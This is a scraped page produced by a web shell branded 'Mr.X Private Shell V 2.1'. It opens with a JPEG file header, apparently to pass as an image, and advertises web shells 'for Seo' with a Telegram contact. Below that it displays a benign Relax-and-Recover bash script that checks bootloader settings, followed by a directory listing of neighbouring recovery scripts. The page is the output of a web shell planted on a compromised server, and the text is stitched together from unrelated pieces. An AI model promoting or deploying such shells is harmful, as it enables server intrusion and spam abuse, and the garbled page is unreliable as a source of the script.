����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# Prepare some checks. # We want to tell the user if we did not install a boot loader. # To accomplish this we set the NOBOOTLOADER variable to a true value # that must be unset or set to an emptly value or set to a non-true value # (so that "is_true $NOBOOTLOADER" returns false, cf. lib/global-functions.sh) # by all boot-loader installation scripts after successfully installing a boot loader # (i.e. "is_true $NOBOOTLOADER || echo a boot loader is already installed"): NOBOOTLOADER=1 # Try to read the BOOTLOADER value if /var/lib/rear/recovery/bootloader is not empty. # Currently (February 2024) the used BOOTLOADER values (grep for '$BOOTLOADER') are: # GRUB for GRUB Legacy # GRUB2 for GRUB 2 # ELILO for elilo # LILO for lilo # GRUB2-EFI for GRUB 2, EFI version # EFI for any EFI bootloader, dummy value # ARM for ARM devices, dummy value # ARM-ALLWINNER for Allwinner devices # ZIPL for zIPL, on IBM Z (s390x) # PPC for any bootloader in the PReP boot partition (can be LILO, YABOOT, GRUB2) local bootloader_file="$VAR_DIR/recovery/bootloader" # The output is stored in an artificial bash array so that $BOOTLOADER is the first word: test -s $bootloader_file && BOOTLOADER=( $( grep -v '^[[:space:]]*#' $bootloader_file ) )
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 050_prepare_checks.sh | File | 1.24 KB | 0644 |
|
| 060_compare_files.sh | File | 2.48 KB | 0644 |
|
| 110_bind_mount_proc_sys_dev_run.sh | File | 6.2 KB | 0644 |
|
| 520_confirm_finalize.sh | File | 3.25 KB | 0644 |
|
| 880_check_for_mount_by_id.sh | File | 1.52 KB | 0644 |
|
| 890_finish_checks.sh | File | 1.23 KB | 0644 |
|
| 900_remount_sync.sh | File | 1.24 KB | 0644 |
|